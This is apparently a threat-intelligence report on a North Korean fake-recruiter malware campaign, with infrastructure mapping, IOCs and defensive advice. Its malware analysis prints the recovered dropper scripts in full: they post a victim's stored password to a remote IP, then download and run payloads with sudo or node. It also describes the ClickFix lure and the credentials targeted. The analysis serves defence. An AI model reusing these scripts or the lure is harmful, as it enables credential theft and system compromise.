Two IOCs In, Five C2 Servers Out: Mapping DPRK's Contagious Interview Campaign From InvisibleFerret to a Kimsuky Crossover

Two IP addresses in a threat report. That's what we started with. By the time GHOST finished pulling threads, we had mapped 5 C2 servers across 4 hosting providers, 5 .cloud domains on a single Namecheap account, a deleted GitHub repository belonging to a fabricated Latin American woman, a serverless Fly.io endpoint disguised as an NVIDIA SDK, and a 4-stage cross-platform kill chain purpose-built to drain everything a developer holds dear -- SSH keys, cloud credentials, browser sessions, and cryptocurrency wallets.

This is the story of Contagious Interview, an active DPRK state-sponsored campaign where North Korean operatives pose as tech recruiters, lure developers into fake job interviews, and deploy a malware toolchain called BeaverTail and InvisibleFerret to compromise their machines across Windows, Linux, and macOS.

It is also a story about how a nation-state's obsession with NVIDIA masquerading and a few lazy OPSEC decisions turned their entire infrastructure into a single graph we could walk.

The Starting Point

The investigation began with two IPs flagged in an InvisibleFerret IOC report: 95[.]216[.]37[.]186 (Hetzner, Finland) and 95[.]164[.]17[.]24 (TheHosting/WorkTitans, Netherlands). Both documented as command-and-control servers for InvisibleFerret, a compiled Python backdoor attributed to DPRK's Famous Chollima cluster -- a Lazarus Group sub-operation that has been targeting software developers since at least 2023.

Two IPs is a starting point, not a conclusion. We wanted the full picture: the infrastructure topology, the attack chain, the samples, the hosting decisions, and the operational fingerprints that tie it all together.

GHOST pulled ThreatFox entries, MalwareBazaar samples, WHOIS records, certificate transparency logs, Shodan services, and subnet scans. What came back was considerably more than two IPs.

Five Servers, Five Domains, One Campaign

The infrastructure spans four hosting providers and a serverless platform, each serving a distinct role in the kill chain:

IP / Endpoint	Provider	Country	Role
95[.]216[.]37[.]186	Hetzner	Finland	Primary C2 (port 5000) + data exfiltration (port 3011)
95[.]164[.]17[.]24	TheHosting/WorkTitans	Netherlands	Secondary C2 (port 1224)
45[.]59[.]163[.]23	Tier.Net	US (Florida)	Windows C2 node (port 1244) -- SMB/RDP exposed, CVE-2020-0796 vulnerable
172[.]86[.]93[.]139	FranTech/BuyVM (PONYNET)	US (Wyoming)	Credential exfiltration endpoint (port 3000)
nvidiasdk[.]fly[.]dev	Fly.io	US	Serverless payload delivery

The primary C2 at 95[.]216[.]37[.]186 runs Node.js/Express on port 5000. When we checked Shodan, it was live -- but now filters all incoming connections. IP-allowlisted C2. The operator knows their server was burned and locked it down rather than burning it.

The Florida node at 45[.]59[.]163[.]23 is the most reckless piece of infrastructure in the set. It's a Windows box with SMB (445), RDP (3389), WinRM (5985), and FTP (21) all exposed to the internet. It's vulnerable to CVE-2020-0796 (SMBGhost). A nation-state running an unpatched Windows box with wide-open management ports as part of a credential theft operation is a particular flavor of irony.

Then there's the credential exfiltration server at 172[.]86[.]93[.]139 -- hosted on FranTech/BuyVM's PONYNET allocation. PONYNET is well-known in abuse reporting circles. If you're exfiltrating stolen passwords, choosing the one ASN that threat researchers check first is not ideal tradecraft.

Alongside the IPs, ThreatFox yielded five .cloud domains, all registered through Namecheap:

Domain	Registered	Certificate
videodriverzone[.]cloud	2025-02-05	Sectigo RSA DV
driversnap[.]cloud	2025-02-05	Sectigo RSA DV
driverstream[.]cloud	2025-02-05	Sectigo RSA DV
videotechdrivers[.]cloud	2025-02-28	Sectigo RSA DV
camdriverstore[.]cloud	2025-02-28	Sectigo RSA DV

Every domain follows a *driver* naming pattern. Every domain uses Sectigo DV certificates (paid, not free Let's Encrypt -- a deliberate choice for perceived legitimacy). Every domain operates its C2 on an api.* subdomain. And all five sit on the same Namecheap account.

Certificate transparency logs reveal the infrastructure was built in two waves. Wave 1 on February 5, 2025 registered three domains and issued base certs, then came back 19 days later to issue api.* subdomain certs. Wave 2 on February 28 registered two more domains and -- having learned from the first round -- issued base and subdomain certs simultaneously. The actor iterated on their deployment process between waves. They got more efficient, but they didn't get more careful.

All five domains are now dead (pendingDelete or clientHold). The infrastructure was active through at least early 2026.

The ClickFix Lure

The attack begins with social engineering. North Korean operatives -- using stolen or fabricated identities -- contact software developers through LinkedIn, Telegram, and Discord, posing as recruiters for legitimate tech companies. The pitch: a job interview that includes a technical coding challenge.

To participate, the developer is told to run a setup command to "fix their camera" or "clean their caches" before the video call. This is the ClickFix technique -- a social engineering pattern where the attacker provides a shell command that the victim executes voluntarily, believing it's a prerequisite for a legitimate application.

What the victim actually runs is a dropper. And from there, the chain forks depending on the operating system.

Four Stages to Total Compromise

We recovered and analyzed 7 distinct malware samples from MalwareBazaar, spanning shell scripts, VBScript loaders, obfuscated JavaScript, and compiled Python binaries. Together, they reveal a 4-stage kill chain that works across all three major operating systems.

Stage 1: The Preinstall Script

#!/usr/bin/env bash
source ~/.myvars
bpaswor=$(echo -n $MY_PASWOR | base64)
curl -X POST -H "Content-Type: text/plain" --data $bpaswor http://172.86.93.139:3000/pawr/ &
curl -sk -A 206 -o /var/tmp/downx64.sh https://raw.githubusercontent.com/RominaMabelRamirez/dify/refs/heads/bai/api/downx64.sh
echo $MY_PASWOR | sudo -S chmod +x /var/tmp/downx64.sh
echo $MY_PASWOR | sudo -S sh /var/tmp/downx64.sh &

The first thing this script does -- before downloading any malware -- is steal the victim's password. During the social engineering phase, the target was instructed to save their system password in a file called ~/.myvars ("for the interview tool to work"). The script sources that file, base64-encodes the password, and POSTs it to the FranTech/BuyVM credential exfiltration server at 172[.]86[.]93[.]139:3000/pawr/.

The password theft fires asynchronously (&) while the rest of the dropper chain proceeds in parallel. They get the credentials regardless of whether the later stages succeed.

Then it downloads the Stage 2 script from GitHub -- not from their own infrastructure, but from a fork of a legitimate open-source project.

The GitHub Persona

The payload staging repository was github[.]com/RominaMabelRamirez/dify, branch bai/api. "Dify" is a real open-source LLM app development platform (dify.ai). The DPRK actors forked it and embedded their payloads in the api/ directory -- a location that would look unremarkable in a legitimate Dify fork.

"RominaMabelRamirez" is a fabricated Latin American female identity. DPRK actors consistently create personas whose demographics don't match their own. The username format -- FirstMiddleLast with no spaces or separators -- is a known pattern across multiple Contagious Interview waves. GitHub has since deleted the repository.

Stage 2: The Downloader

#!/usr/bin/env bash
source ~/.myvars
mkdir -p ~/.n3
curl -k -A 205 -o /var/tmp/x64nvidia https://raw.githubusercontent.com/RominaMabelRamirez/dify/refs/heads/bai/api/x64nvidia
echo $MY_PASWOR | sudo -S chmod +x /var/tmp/x64nvidia
echo $MY_PASWOR | sudo -S /var/tmp/x64nvidia &
curl -k -A 207 -o ~/.n3/payuniversal2 https://raw.githubusercontent.com/RominaMabelRamirez/dify/refs/heads/bai/api/payuniversal2

Stage 2 downloads two payloads: x64nvidia (the primary BeaverTail binary) and payuniversal2 (a backup). It creates a hidden directory ~/.n3/ for staging, then enters a polling loop checking for ~/.npc -- a Python payload presumably dropped by the JavaScript stage. If the Python payload appears, it runs that; otherwise, it falls back to the compiled binary.

The redundancy is deliberate. Multiple delivery paths ensure the backdoor lands even if one stage fails.

The Numeric User-Agent Fingerprint

Every download request in the dropper chain uses a numeric-only User-Agent string: 205, 206, 207, 209. Not a browser string. Not a curl default. Just a bare integer.

These are payload selectors -- the C2 server can use the User-Agent to determine which stage of which infection chain is requesting what payload. But they're also a unique operational fingerprint. Any HTTP request with a purely numeric 3-digit User-Agent is inherently suspicious, and this pattern is specific enough to serve as a high-fidelity campaign marker.

The Alternative Path: NVM and Fly.io

A parallel infection chain skips GitHub entirely and uses the Fly.io serverless platform:

#!/usr/bin/env bash
wget -qO- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.2/install.sh | bash
\. "$HOME/.nvm/nvm.sh"
nvm install 20.19.0
nvm use 20.19.0
wget --no-check-certificate --user-agent="209" -O ~/.linvidia https://nvidiasdk.fly.dev/nvs
node ~/.linvidia 2>&1 &

This installs NVM from the legitimate nvm-sh repository (not compromised), downloads Node.js 20.19.0, then fetches an obfuscated JavaScript payload from nvidiasdk[.]fly[.]dev/nvs and runs it with Node. The specificity of the Node version (20.19.0) suggests the payload depends on particular runtime features.

The use of Fly.io for payload delivery is notable. Serverless platforms provide ephemeral infrastructure that's difficult to blocklist at the IP level -- the payload is served from Fly.io's shared infrastructure alongside thousands of legitimate applications. The nvidiasdk[.]fly[.]dev subdomain is now dead, but while it was live, it was effectively free C2 infrastructure with built-in CDN and TLS.

Stage 3: BeaverTail and InvisibleFerret

The 92KB JavaScript payload (be258c5f831f.js) is heavily obfuscated across multiple layers: hex-encoded variable names, array shuffling with parseInt validation, control flow flattening, and anti-debugging checks. The entire payload is wrapped as a JSON "cookie" value designed to be eval'd by the Node.js runtime.

When deobfuscated, BeaverTail downloads and executes InvisibleFerret -- a compiled Python backdoor available as both an 8.8MB ELF (Linux) and an 8.5MB PE (Windows). InvisibleFerret connects to the primary C2 at 95[.]216[.]37[.]186:5000 for commands and 95[.]216[.]37[.]186:3011 for data exfiltration, with 95[.]164[.]17[.]24:1224 as a secondary C2.

What InvisibleFerret steals is a developer's entire working life:

• SSH keys: ~/.ssh/* -- instant access to every server the developer can reach
• AWS credentials: ~/.aws/credentials, ~/.aws/config
• Azure credentials
• GCP credentials: ~/.config/gcloud/*
• Environment files: .env, .env.local, .env.production -- database passwords, API keys, secrets
• Browser data: Login credentials, cookies, history, bookmarks, and extensions from Chrome, Brave, Opera, Edge, and Yandex
• Cryptocurrency wallets

This is not a spray-and-pray infostealer. It is a targeted exfiltration toolkit designed for developers who have sudo access on production servers and admin credentials for cloud platforms. One compromised developer at a tech company gives the DPRK access to the entire cloud infrastructure.

The Windows Path

On Windows, the delivery mechanism uses a VBScript dropper (update.vbs) that extracts a password-protected archive (p8.zi, password: ppp) using a copy of 7-Zip that has been renamed to .vscode\argv.exe. The .vscode directory name provides a legitimacy veneer -- it looks like a VS Code component. The extracted payload is nvidiasdk.exe, the Windows variant of InvisibleFerret.

Persistence on Windows uses the registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaDriverUpdate. On macOS, it drops a LaunchAgent at ~/Library/LaunchAgents/com.avatar.update.wake.plist. On Linux, it creates .desktop files in ~/.config/autostart/.

The NVIDIA Masquerade

The NVIDIA branding runs through the entire campaign like a thread. The domains reference "video drivers." The registry persistence key is NvidiaDriverUpdate. The binaries are named nvidiasdk.exe, x64nvidia, and .linvidia. The encrypted archive is NVIDIA.zip. The Fly.io endpoint is nvidiasdk.fly.dev.

This is not coincidence -- it's calculated. NVIDIA drivers are installed on the majority of developer workstations. A process named NvidiaDriverUpdate in the Run key won't trigger a second glance from most users or even most endpoint detection tools. But using the same masquerade across the entire campaign -- domains, filenames, persistence, infrastructure -- means that once you identify the NVIDIA theme in one artifact, you can pattern-match across everything else.

OPSEC Failures

For a nation-state operation, the operational security is uneven. The multi-stage delivery chain, compiled Python payloads, and JavaScript obfuscation reflect professional tradecraft. But the infrastructure management tells a different story.

The Namecheap problem. All five .cloud domains are registered through the same registrar account. This means that once any single domain is identified as malicious, a registrar-level pivot reveals the entire domain set. Five C2 domains for five dollars' worth of OPSEC improvement -- separate registrar accounts -- and they didn't bother.

The naming pattern. Every domain contains "driver": videodriverzone, videotechdrivers, driversnap, camdriverstore, driverstream. Pattern-based detection rules could catch future domain registrations in this campaign with a single regex.

The certificate timeline. Two waves of Sectigo DV cert issuance, 23 days apart, reveal the exact infrastructure build schedule. Wave 1 required a return visit for subdomain certs; Wave 2 consolidated the process. The actor's operational learning curve is visible in the certificate transparency logs.

The numeric User-Agents. Using 3-digit integers as HTTP User-Agent strings is operationally unique. It makes the dropper traffic trivially distinguishable from any legitimate HTTP client.

FranTech/BuyVM for credential exfiltration. PONYNET is one of the most abuse-reported ASNs on the internet. Hosting your credential receiver there is the network equivalent of running a stolen goods operation out of a police station parking lot.

The Kimsuky Connection

Among the samples we recovered from MalwareBazaar, one stands out: chaotic_capybara, a 52KB Mach-O binary (SHA256: 469fd8a280e89a...). It's tagged with both ContagiousInterview (Lazarus/Famous Chollima) and Kimsuky/VelvetChollima.

Lazarus and Kimsuky are traditionally considered separate DPRK cyber units with different mandates -- Lazarus focuses on financial operations, Kimsuky on espionage. A sample carrying attribution markers for both suggests either tool sharing between units, a shared development pipeline, or operational convergence. Given the DPRK's centralized cyber command structure, the most likely explanation is that both units draw from a common tooling repository, with individual operators customizing payloads for their specific missions.

This also connects to a broader pattern we've been tracking. Just yesterday, we confirmed the axios BlueNoroff attack -- another DPRK-attributed campaign from a different Lazarus sub-unit. BlueNoroff, Famous Chollima, and now potentially Kimsuky -- all operating under the same DPRK umbrella, all targeting developers and financial infrastructure, all active simultaneously. The DPRK's cyber apparatus is not a single team. It's a constellation of units running parallel operations with overlapping tools and shared infrastructure patterns.

Campaign Timeline

Date	Event
2025-01-23	First InvisibleFerret JS sample appears on MalwareBazaar
2025-02-05	Wave 1: Three .cloud domains registered, base certs issued
2025-02-24	Wave 1: api.* subdomain certs issued
2025-02-28	Wave 2: Two more .cloud domains registered, all certs issued same day
2025-03-05	.cloud domains first reported to ThreatFox (reporter: lontze7)
2025-03-24	chaotic_capybara (Kimsuky crossover sample) first seen
2025-04-16	Tier.Net C2 (45[.]59[.]163[.]23:1244) reported to ThreatFox
2025-04-22	newbeaver.py sample uploaded to MalwareBazaar
2025-09-11	Major sample batch uploaded (nvidiasdk.exe, x64nvidia, all dropper scripts)
2025-09-19	NVIDIA.zip and full campaign archive uploaded
2026-02-28	Tier.Net C2 last seen active
2026-03-02	.cloud C2 domains last active on ThreatFox
2026-03-19	videodriverzone.cloud enters pendingDelete
2026-03-31	This investigation -- primary C2 now filtered, infrastructure transitioning

The campaign has been running for over a year. Infrastructure is cycling -- domains are dying, the primary C2 is locking down -- but the operation is not over. The tooling is mature, the social engineering playbook is proven, and the actor has demonstrated the ability to stand up new infrastructure in waves.

Indicators of Compromise

Network IOCs

C2 IP Addresses:

• 95[.]216[.]37[.]186:5000 -- Primary C2 (Node.js/Express)
• 95[.]216[.]37[.]186:3011 -- Data exfiltration
• 95[.]164[.]17[.]24:1224 -- Secondary C2
• 45[.]59[.]163[.]23:1244 -- ThreatFox-documented C2
• 172[.]86[.]93[.]139:3000 -- Credential exfiltration (/pawr/ endpoint)

C2 Domains:

• api[.]videodriverzone[.]cloud
• api[.]videotechdrivers[.]cloud
• api[.]driversnap[.]cloud
• api[.]camdriverstore[.]cloud
• api[.]driverstream[.]cloud
• nvidiasdk[.]fly[.]dev

Payload Staging:

• hxxps://raw[.]githubusercontent[.]com/RominaMabelRamirez/dify/refs/heads/bai/api/* (deleted)
• hxxps://nvidiasdk[.]fly[.]dev/nvs

User-Agent Campaign Markers:

• 205, 206, 207, 209 (numeric-only User-Agent strings)

Malware Samples (SHA256)

Hash	File	Type
699cd6c292b8a5...	InvisibleFerret Linux	ELF (8.8 MB)
1c8c1a693209c3...	InvisibleFerret Windows	PE (8.5 MB)
bf7a54cf4ded7a...	be258c5f831f.js	Obfuscated JS (92 KB)
c5474d5f9e9888...	newbeaver.py.zip	Python backdoor
9b80897b72f355...	Campaign archive	ZIP
fa628b8575564d...	NVIDIA.zip	Dropper archive
25c9fc5c5564a7...	x64nvidia	Mach-O (BeaverTail)
e79b827b3cc29e...	nvidiasdk.exe	PE (BeaverTail)
17891f7db5a633...	nvidia.tar.gz	BeaverTail archive
6a16b1ef16e999...	update.vbs	VBScript dropper
247fdba5fbfd07...	preinstall	Shell dropper
e224a1db42ae21...	clickfix_second_stage	Shell dropper
9bc46c59e734b2...	clickfix_first_stage	Shell dropper
65665c3faba4fb...	downx64.sh	Shell dropper
469fd8a280e89a...	chaotic_capybara	Mach-O (Kimsuky crossover)

Host Indicators

Persistence:

• Registry: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NvidiaDriverUpdate
• macOS: ~/Library/LaunchAgents/com.avatar.update.wake.plist
• Linux: ~/.config/autostart/*.desktop
• Windows Startup: %APPDATA%\...\Startup\queue.bat

File System Artifacts:

• ~/.myvars -- password storage (social engineering artifact)
• ~/.npc -- Python payload marker
• ~/.linvidia -- obfuscated JS payload
• ~/.n3/payuniversal2 -- backup binary
• /var/tmp/x64nvidia -- BeaverTail binary (Linux)
• /var/tmp/downx64.sh -- dropper script
• %TEMP%\nvidiasdk\.vscode\argv.exe -- renamed 7-Zip
• %TEMP%\nvidiasdk\p8.zi -- encrypted archive (password: ppp)
• %TEMP%\nvidiasdk\nvidiasdk.exe -- InvisibleFerret PE

Credential Targets:

• ~/.ssh/*
• ~/.aws/credentials, ~/.aws/config
• ~/.config/gcloud/*
• .env, .env.local, .env.production
• Browser stores: Chrome, Brave, Opera, Edge, Yandex

Takeaways

For developers: If someone contacts you about a job opportunity and asks you to run a terminal command to "fix your camera" or "set up the interview environment" -- stop. No legitimate recruiter will ever ask you to execute shell commands. If they ask you to save your password in a file, that is not a red flag. That is the entire red flag factory.

For security teams: Hunt for the NvidiaDriverUpdate registry key, the com.avatar.update.wake.plist LaunchAgent, and anomalous .desktop files in autostart directories. Check for ~/.myvars, ~/.npc, and ~/.linvidia across developer workstations. Any outbound connections to non-standard ports (5000, 3011, 1224, 1244, 3000) from developer machines warrant investigation. Numeric-only User-Agent strings in HTTP logs are near-certain indicators of this campaign.

For the threat intelligence community: The Contagious Interview campaign has been running for over a year with incremental infrastructure refreshes. The tooling is cross-platform, the social engineering is proven, and the DPRK is running multiple parallel developer-targeting operations (Contagious Interview, BlueNoroff axios attack) simultaneously. The crossover between Lazarus and Kimsuky tooling visible in the chaotic_capybara sample suggests these operations may be more interconnected than traditional unit-based attribution models assume.

We started with two IPs from a public report. We ended with a complete infrastructure map, a full attack chain, 15 malware samples, and evidence of cross-unit DPRK tool sharing. The campaign domains are dying, but the operators are not done. They'll register new domains, stand up new servers, and send new LinkedIn messages. The playbook works too well to abandon.

The next time a recruiter reaches out with an opportunity that seems too good to be true, and the interview process requires you to run something in your terminal -- remember that the person on the other end might be working for a government that funds nuclear weapons programs with stolen cryptocurrency. And they want your ~/.ssh directory.

---

This investigation was conducted by Breakglass Intelligence's autonomous GHOST system, starting from two IOC IPs and expanding through ThreatFox, MalwareBazaar, certificate transparency, WHOIS, and Shodan pivots. All evidence was collected via passive and semi-passive methods. Abuse reports have been drafted for all identified hosting providers.

Breakglass Intelligence | March 31, 2026